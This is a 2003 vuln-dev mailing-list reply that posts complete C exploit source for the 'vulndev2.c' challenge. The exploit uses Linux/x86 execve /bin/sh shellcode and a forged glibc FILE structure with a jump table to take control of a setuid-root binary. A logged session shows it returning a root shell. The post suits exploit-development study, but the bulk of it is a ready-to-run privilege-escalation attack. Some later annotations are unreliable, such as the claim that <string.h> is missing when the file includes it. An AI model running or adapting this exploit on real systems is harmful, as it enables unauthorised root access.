
Re: [Vuln-dev Challenge] Challenge #2


From: "D." <dugely () yahoo com>
Date: Sat, 24 May 2003 04:59:35 -0700 (PDT)

Hello vuln-dev!

Attached is an exploit for vulndev2.c, or you can
download it here:

http://www.hcsw.org/sploits/vulndev2sploit.c

This was a fun challenge and I hope there are lots of
interesting posts about it as well as many more
interesting challenges in the future!

Doug Hoyte
Hypervivid Solutions, Inc

__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com
/*

  vulndev2.c exploit - (C) 2003 Doug Hoyte and Hypervivid Solutions, Inc

  www.hypervivid.com
  www.hcsw.org
  fractal@efnet



doug@saturn:~/devel/vulndev$ uname -mnrsp
Linux saturn 2.4.19 i686 unknown
doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2sploit vulndev2sploit.c
doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2 vulndev2.c
doug@saturn:~/devel/vulndev$ su
Password:
root@saturn:/home/doug/devel/vulndev# chown root vulndev2
root@saturn:/home/doug/devel/vulndev# chgrp root vulndev2
root@saturn:/home/doug/devel/vulndev# chmod a+rxs vulndev2
root@saturn:/home/doug/devel/vulndev# exit
doug@saturn:~/devel/vulndev$ ls -al vulndev2
-rwsr-sr-x    1 root     root        18373 May 24 04:16 vulndev2
doug@saturn:~/devel/vulndev$ ./vulndev2sploit ./vulndev2 bffff86c

[*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com

[*] Using offset bffff86c

[*] Removing old log file 'db.log'

[*] Sploiting...

;;Ìøÿ¿;;
sh-2.05a# whoami
root
sh-2.05a# exit
doug@saturn:~/devel/vulndev$



*/



#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>



/* my strtok's, well... don't ask */
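/*
 * Parse a hexadecimal string into an int.
 *
 * An optional "0x" / "0X" prefix is skipped; parsing stops at the first
 * non-hex character, so trailing junk is ignored rather than rejected.
 * Digits are accumulated in an unsigned int so that a value with the top
 * bit set (e.g. a stack address such as "bffff86c") does not perform a
 * left shift that overflows a signed int, which is undefined behaviour.
 *
 * @param tp  NUL-terminated string to parse; NULL yields 0.
 * @return    the parsed value converted to int (more than 8 hex digits
 *            wrap modulo 2^32; the final unsigned->int conversion is
 *            implementation-defined for values above INT_MAX); 0 when
 *            no hex digits are present.
 */
int my_hatoi(const char *tp) {
  unsigned int acc = 0;

  if (tp == NULL) return 0;

  /* allow a conventional 0x / 0X prefix */
  if (tp[0] == '0' && (tp[1] == 'x' || tp[1] == 'X')) tp += 2;

  for (;; tp++) {
    /* cast before <ctype.h> calls: a negative plain char is UB there */
    int c = tolower((unsigned char)*tp);
    if (!isxdigit(c)) break;

    unsigned int digit = isdigit(c) ? (unsigned int)(c - '0')
                                    : (unsigned int)(c - 'a' + 10);
    acc = (acc << 4) | digit;   /* unsigned: wraps instead of overflowing */
  }

  return (int)acc;
}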



/*
 * Entry point.  argv[1] is the path to the target binary, argv[2] the hex
 * address of the target's 'buf' (parsed by my_hatoi).  Side effects: removes
 * 'db.log' from the current directory, then replaces this process with the
 * target via execl().  Returns 0 on a usage error; also falls through to
 * return 0 if execl() fails, because its return value is never checked.
 *
 * Build note: memset() and memcpy() are used below but <string.h> is not
 * included by this file, so they are implicitly declared -- a conformance
 * error under C99 and later.
 */
int main (int argc, char *argv[]) {

  // shellcode for Linux/x86 by Aleph Null
  char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  char sploit1[2000];
  char sploit2[100];
  // tp is an int view over sploit1: writing through it type-puns a char
  // array, which is a strict-aliasing/alignment concern; memcpy() of each
  // 4-byte value is the portable form.
  int i, ADDR_OF_BUF, *tp;

  printf("\n[*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com\n\n");

  // argv[1] is not validated beyond existence; a missing target only
  // shows up as the unchecked execl() failure at the end.
  if (argc != 3) {
    printf("       Usage: %s <path to vulndev2> <offset>\n", argv[0]);
    printf("       Offset should be the location in memory of the 'buf' variable\n\n");
    return 0;
  }

  // ADDR_OF_BUF is a signed int holding an address; %x expects an
  // unsigned argument (use %x with (unsigned)ADDR_OF_BUF, or %u).
  ADDR_OF_BUF = my_hatoi(argv[2]);
  printf("[*] Using offset %x\n\n", ADDR_OF_BUF);

  /* Remove the old log file */
  // Best effort: unlink()'s return value is ignored, so a missing or
  // undeletable db.log is silently skipped.
  printf("[*] Removing old log file 'db.log'\n\n");
  unlink("db.log");

  // Everything to 'a's
  // No NUL terminator is written here; the argument string is terminated
  // only by the trailing '\0' that sizeof(shellcode) copies in further down.
  memset(sploit1, 'a', sizeof(sploit1));

  // Set BFP to point 2 bytes before F1 (so those damn semi-colons don't get in the way)
  *((int*)(sploit1+92)) = ADDR_OF_BUF-4-2;


  // The magic number for FILE structs on glibc is 0xfBAD! Dig?
  // 0xFBAD0101 is an unsigned literal above INT_MAX; storing it in an int
  // relies on the implementation-defined conversion.
  tp = (int*) (sploit1+96);
  tp[0] = 0xFBAD0101;

  // The FILE struct BS, we don't really care: we just want the ...
  for(i=1;i<40;i++) tp[i] = (int) (ADDR_OF_BUF+96+(40*4));

  // ... jump table
  // tp[0..47] covers sploit1[96..287]; the memcpy below starts at 288, so
  // the layout is contiguous and 288+sizeof(shellcode) is well inside 2000.
  for(i=40;i<48;i++) tp[i] = (int) (ADDR_OF_BUF+96+(40*4)+(8*4));


  // Tag the shell code on at the end
  memcpy(sploit1+96+(40*4)+(8*4), shellcode, sizeof(shellcode));

  // Use arg #2 to point F1 to our FILE struct
  memset(sploit2, '\0', sizeof(sploit2));
  *((int*)sploit2) = ADDR_OF_BUF+96;

  // There's a bad moon on the rise...
  // execl() only returns on failure (-1); that case is not checked, so the
  // program silently exits 0.  Checking it with perror("execl") and a
  // non-zero return would make a bad path or permissions visible.
  printf("[*] Sploiting...\n\n");
  execl(argv[1], argv[1], sploit1, sploit2, NULL);

  return 0;

}
